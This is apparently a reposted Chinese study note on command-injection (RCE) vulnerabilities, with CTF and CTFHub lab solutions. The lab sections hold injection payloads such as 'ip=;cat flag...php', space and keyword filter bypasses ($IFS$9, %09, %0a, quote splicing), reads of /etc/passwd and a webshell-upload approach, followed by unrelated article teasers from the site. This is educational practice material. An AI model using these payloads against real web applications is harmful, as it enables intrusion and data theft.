7月21日總結

命令執行

RCE

RCEremote code execute):遠程命令執行或者代碼執行,我們平時說的rce,比如thinkPHP
rce漏洞,即算代碼注入漏洞,也算rce漏洞,因為滲透的最終情況可以實現執行命令或者是代碼都屬于
RCE,例如代碼執行、文件包含、反序列化、命令執行,甚至是寫文件Getshell都可以屬于RCE

命令執行的原理

命令執行漏洞指的是網站的應用程序有些需要調用執行系統命令,當用戶能控制這些函數中的參數
時,就可以將惡意系統命令拼接到正常命令中,從而造成命令執行攻擊。
system("cat /flag")

命令執行的成因

1、代碼層過濾不嚴格:商業應用需要執行命令,商業應用的一些核心代碼可能封住在二進制文件當中,
web應用中通過system函數調用。
system("/bin/program --arg $arg")
2、調用第三方組件存在的代碼執行漏洞:如wordpress,可以選擇imagemagick這個常用的圖片處理
組件,處理用戶上傳圖片時造成命令執行;還有JAVA struts2/elasticsearch groovy等。

命令執行漏洞分類

1、代碼層過濾不嚴
2、系統的漏洞造成命令注入
3、調用的第三方組件存在代碼執行漏洞

RCE

RCEremote code execute):遠程命令執行或者代碼執行,我們平時說的rce,比如thinkPHP
rce漏洞,即算代碼注入漏洞,也算rce漏洞,因為滲透的最終情況可以實現執行命令或者是代碼都屬于
RCE,例如代碼執行、文件包含、反序列化、命令執行,甚至是寫文件Getshell都可以屬于RCE

命令執行的原理

命令執行漏洞指的是網站的應用程序有些需要調用執行系統命令,當用戶能控制這些函數中的參數
時,就可以將惡意系統命令拼接到正常命令中,從而造成命令執行攻擊。
system("cat /flag")

命令執行的成因

1、代碼層過濾不嚴格:商業應用需要執行命令,商業應用的一些核心代碼可能封住在二進制文件當中,
web應用中通過system函數調用。
system("/bin/program --arg $arg")
2、調用第三方組件存在的代碼執行漏洞:如wordpress,可以選擇imagemagick這個常用的圖片處理
組件,處理用戶上傳圖片時造成命令執行;還有JAVA struts2/elasticsearch groovy等。

命令執行漏洞分類

1、代碼層過濾不嚴
2、系統的漏洞造成命令注入
3、調用的第三方組件存在代碼執行漏洞

啟用一個端口為8081的服務器

Windows常用的命令和特殊字符

常用的命令

1dir----查看文件目錄
2ipconfig----查看WindowsIP地址
3arp -a----查看ARP緩存表
4calc----在命令行打開計算器
5regedit----打開注冊表
6netstat -ano----查看開放的端口信息

特殊字符

1| 直接執行后面的語句
2|| 前面出錯執行后面的,前面為假
3& 前面的語句為假則直接執行后面的,前面可真可假
4&& 前面的語句為假則直接出錯,后面的也不執行,前面只能為真

Linux常用的命令和特殊字符

常用的命令

1cat /etc/passwd----查看
2passwd文件 id----查看該用戶的ID
3groups----查看用戶所屬的組
4cat /etc/group----查看組信息
5whoami----查看當前用戶
6pwd----查看當前路徑
7uname -a----查看主機信息
8cat /etc/issue----查看主機的配置信息
9netstat -pantu----查看開放的端口信息
10netstat -nr----查看路由信息

特殊字符

1、; 前面的執行完執行后面的
2| 管道符,顯示后面的執行結果
3|| 當前面的執行出錯時執行后面的
4& 前面的語句為假則直接執行后面的,前面可真可假
5&& 前面的語句為假則直接出錯,后面的也不執行,前面只能為真
6、換行符(編碼)
"exec(),echo(),eval()..."點擊查看元寶的回答
https://yuanbao.tencent.com/bot/app/share/chat/fhZKut0sp8oO(最底下見)

exec(),echo,eval()

函數作用輸入類型輸出結果安全風險等級
??exec()??執行系統命令字符串(命令)命令的最后一行?? 高危(命令注入)
??echo??輸出內容字符串/變量直接顯示內容? 安全
??eval()??執行字符串中的代碼字符串(代碼)代碼執行結果?? 極高危(代碼注入)

第一種方法

上傳木馬,然后通過蟻劍連接查找flag

第二種方法

利用重定向符

ip=1;ls /> 1.txt  查找根目錄
ip=1;ls>1.txt     查找目錄
ip=1;cat /flag.txt> 1.txt   查找flag

空格繞過

以ls /舉例
{ls,/}

以ls /
ls${IFS}/

使用 < , < 表示的是輸入重定向的意思,就是把 < 后面跟的文件取代鍵盤作為新的輸入設備。“命令 <
文件” ,這是將文件作為命令輸入
ls</

ls%09/
ls$IFS$9/

[GXYCTF2019]Ping Ping Ping 1

flag,空格被過濾

1,使用傳遞參數(因為不能出現flag整體)黑名單繞過

2,使用反引號

3,使用base64將cat flag.php編碼

ctfhub技能樹

命令注入

ip=;ls  查看當前目錄  
ip=;cat 883914094984.php  查看源碼得到flag

過濾cat

試了一下,這些方法都可以,成功后查詢源碼即可

過濾空格

試了一下,%09,$IFS$9,${IFS},<重定向符號都可以

直接查詢后檢查源代碼即可

過濾目錄分隔符

cat /目錄名/文件名和cd 目錄名;cat 文件名的區別

點擊查看元寶的回答
https://yuanbao.tencent.com/bot/app/share/chat/JVfus9hjYbil

ip;ls  查看當前目錄ip;cd flag_is_here;ls  使用cd命令進入flag_is_here  查看其下的文件ip;cd flag_is_here;cat flag_146242307015503.php  打印flag_146242307015503.php檢查源碼即可

過濾運算符

過濾了&,|,使用;即可

ip=;ls
ip=;cat flag_19386297068450.php

綜合過濾練習

這里使用單引號''繞過,這里用$@、$*、""都可以繞過,變量拼接似乎不行

ip=%0als 查看當前目錄ip=%0acd$IFS$9fla$1g_is_here%0als   使用cd命令進入flag_is_here,并用ls查看其內容ip=%0acd$IFS$9fla$1g_is_here%0aca$1t$IFS$9fla$1g_146242307015503.php  
打印flag_146242307015503.php然后查看flag

通配符繞過

可以使用通配符繞過
通配符是一種特殊語句,主要有星號(*)和問號(?),用來模糊搜索文件。當查找文件夾時,可以使 用它來代替一個或多個真正字符;當不知道真正字符或者懶得輸入完整名字時,常常使用通配符代替一 個或多個真正的字符

以上內容詳細可見(命令執行的PPT)

命令執行漏洞利用及繞過方式總結,從零基礎到精通,收藏這篇就夠了!_當利用遠程命令執行漏洞執行系統命令時,空格被防護代碼過濾,以下哪個符號可以替代_命令注入繞過空格-CSDN博客

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/news/915493.shtml
繁體地址,請注明出處:http://hk.pswp.cn/news/915493.shtml
英文地址,請注明出處:http://en.pswp.cn/news/915493.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

Linux——自制shell命令行解釋器

文章目錄1.打印命令提示符2.獲取用戶輸入指令3.重定向分析4.命令行參數表,環境變量表,初始化5.命令解析6.命令執行6.1.創建子進程6.2 處理內建命令6.3 文件重定向7.源碼前言 在實現shell的時候我們先創建自己myshell目錄&#xff0c;在目錄中創建myshell.cc文件&#xff0c;因…

Boost庫智能指針boost::shared_ptr詳解和常用場景使用錯誤示例以及解決方法

1、Boost智能指針 —— boost::shared_ptr 詳解一、什么是 boost::shared_ptr boost::shared_ptr 是 Boost 庫中實現的一個智能指針模板類&#xff0c;用于管理動態分配的對象生命周期&#xff0c;采用引用計數機制。多個 shared_ptr 實例可以共享同一個對象的所有權&#xff0…

科學分析指南,如何快速找到并清理磁盤的無用文件

隨著時間的推移&#xff0c;系統中會積累大量的臨時文件、緩存文件、不再需要的安裝包或其他大型文件。磁盤清理可以刪除這些不必要的文件&#xff0c;從而釋放寶貴的磁盤空間。它無需安裝&#xff0c;插上 U 盤就能直接使用。只需勾選需要掃描的磁盤&#xff0c;點擊“開始分析…

Laravel 系統版本查看及artisan管理員密碼找回方法針對各個版本通用方法及原理-優雅草卓伊凡

Laravel 系統版本查看及artisan管理員密碼找回方法針對各個版本通用方法及原理-優雅草卓伊凡一、查看 Laravel 版本的方法優雅草蜻蜓T會議系統專業版 最近又有客戶要了&#xff0c;但是發現 密碼不對 管理員賬戶密碼不對&#xff0c;卓伊凡必須處理下&#xff0c;這里順便講解密…

針對大規模語言模型的上下文工程技術調研與總結(翻譯并摘要)

針對大規模語言模型的上下文工程技術調研與總結聲明摘要部分翻譯介紹部分翻譯相關工作部分翻譯并摘要為什么使用上下文工程&#xff08;翻譯并摘要&#xff09;基礎組件&#xff08;翻譯并摘要&#xff09;RAG&#xff08;翻譯并摘要簡單介紹一下個人認為比較好的技術&#xff…

QT配置Quazip外部庫

1.下載QuaZip源碼網址&#xff1a;https://sourceforge.net/projects/quazip/  注&#xff1a;下載->解壓->打開.pro文件2.編譯QuaZip源碼2.1配置zlib注&#xff1a;QuaZip需zlib的支持&#xff0c;我們需要引用zlib找到本地安裝Qt目錄下zlib目錄&#xff1a;注&#x…

從C++開始的編程生活(4)——類的定義、訪問限定符、類域、類的實例化和this指針

前言 本系列文章承接C語言的學習&#xff0c;需要有C語言的基礎才能學會哦~ 第3篇主要講的是有關于C的類的定義、訪問限定符、類域、類的實例化和this指針。 C才起步&#xff0c;都很簡單呢&#xff01; 目錄 前言 類 基本語法 訪問限定符 基本語法 類域 類的實例化 內…

AD域控制器虛擬化的安全加固最佳實踐

以下是AD域控制器虛擬化安全加固的7項核心實踐&#xff0c;結合最新Windows Server 2022特性與虛擬化環境需求&#xff1a;基礎架構強化? 采用靜態IP分配并確保所有域控節點DNS指向主DC&#xff08;如192.168.1.10&#xff09;? 虛擬機模板需預配置林/域功能級別為Windows Se…

java解析nc氣象數據

1.1pom.xml<dependency><groupId>edu.ucar</groupId><artifactId>netcdfAll</artifactId><version>5.4.1</version></dependency>1.2 netcdf使用/** param type 0 ,1, 2 wind 1 or 2 其他 0 .* return Map* */public Map i…

STC8H8K64U SKDIP28芯片頻率占空比PWM波形

/****PWM輸出任意周期占空比波形*******/ #include "STC8H.h" // #include "intrins.h" // #define uchar unsigned char // #define uint unsig…

【RK3576】【Android14】USB開發調試

獲取更多相關的【RK3576】【Android14】驅動開發&#xff0c;可收藏系列博文&#xff0c;持續更新中&#xff1a; 【RK3576】Android 14 驅動開發實戰指南 硬件接口 RK3576支持兩個USB3.0控制器 驅動開發 dts配置 在“Android14/kernel-6.1/arch/arm64/boot/dts/rockchip/rk…

20. TaskExecutor與ResourceManager心跳

20. TaskExecutor與ResourceManager心跳 現在&#xff0c;需要回過頭看 ResourceManager是如何產生心跳管理服務的。cluster.initializeServices 方法的 heartbeatServices createHeartbeatServices(configuration);產生一個 HeartbeatServicesImpljobmanager的 resourceManag…

OS19.【Linux】進程狀態(上)

目錄 1.情景引入 2.操作系統學科對進程狀態的分類 運行狀態 基于時間片的輪轉調度算法 阻塞狀態 等待IO設備的例子 等待其他進程中需要獲取的數據 進程喚醒 掛起狀態(全稱為阻塞掛起狀態) 簡單談談虛擬內存管理 就緒狀態 筆面試題 3.Linux對進程狀態的分類 R和S狀…

如何優雅地修改項目的 Android 版本(API 級別)

引言 在 Android 開發的日常迭代中&#xff0c;我們經常需要升級或降級項目的 minSdkVersion、targetSdkVersion 與 compileSdkVersion。升級可以解鎖新特性和性能優化&#xff1b;降級則可能為了兼容舊機型或快速驗證問題。本文將手把手演示在 Android Studio 里修改 Android …

GNU Radio多類信號多種參數數據集生成技巧

參考我的這篇博客&#xff0c;我想自制一個多信號數據集&#xff1a; 【多雷達信號硬件模擬】 3臺USRP1臺VSG信號發生器模擬多雷達信號&#xff0c;1臺USRP產生高斯噪聲模擬更多信道環境&#xff0c;1臺USRP采集信號 需要在多個波段對四種信號進行參數設置&#xff0c;帶寬有…

Ansible + Shell 服務器巡檢腳本

腳本概述這是一個用于服務器日常巡檢的 Shell 腳本&#xff0c;主要功能包括&#xff1a;檢查多臺主機的網絡連通性 監控CPU、內存和磁盤使用率 生成詳細的巡檢報告 通過企業微信發送告警通知核心技術點1. 主機批量管理使用Ansible工具遠程執行命令和腳本 通過主機…

Linux-rpm和yum

一、RPMRPM&#xff08;Red Hat Package Manager&#xff09;是一個用于管理 Red Hat 系列 Linux 發行版&#xff08;如 RHEL、CentOS、Fedora&#xff09;軟件包的工具。RPM 允許用戶以統一的格式來安裝、卸載、升級和查詢軟件包。它是 .rpm 文件的主要工具&#xff0c;后綴名…

手推OpenGL相機的正交投影矩陣和透視投影矩陣(附源碼)

概述計算OpenGL的正交投影矩陣和透視投影矩陣是有現成函數的。自己手推不是為了重復造輪子。手推一遍&#xff0c;可以極大的加強對這兩個矩陣的理解。同時也可以滿足一下自己求知欲。正交投影矩陣手推正交投影矩陣源碼 WGMatrix4x4 WGMatrix4x4::BuildOrtho(double l, double …

【跨國數倉遷移最佳實踐2】MaxCompute SQL執行引擎對復雜類型處理全面重構,保障客戶從BigQuery平滑遷移

本系列文章將圍繞東南亞頭部科技集團的真實遷移歷程展開&#xff0c;逐步拆解 BigQuery 遷移至 MaxCompute 過程中的關鍵挑戰與技術創新。本篇為第二篇&#xff0c;跨國數倉遷移背后 MaxCompute 的統一存儲格式創新。 注&#xff1a;客戶背景為東南亞頭部科技集團&#xff0c;…

react(基礎篇)

React由Meta公司研發&#xff0c;用于構建Web和原生交互界面的庫。 React 官方中文文檔 查看JSX &#xff08;一&#xff09;React組件 用戶界面的一部分&#xff0c;通俗的來講&#xff0c;最小的元素組成的單元&#xff0c;可以實現部分邏輯與功能 房子的門就可以看成一個…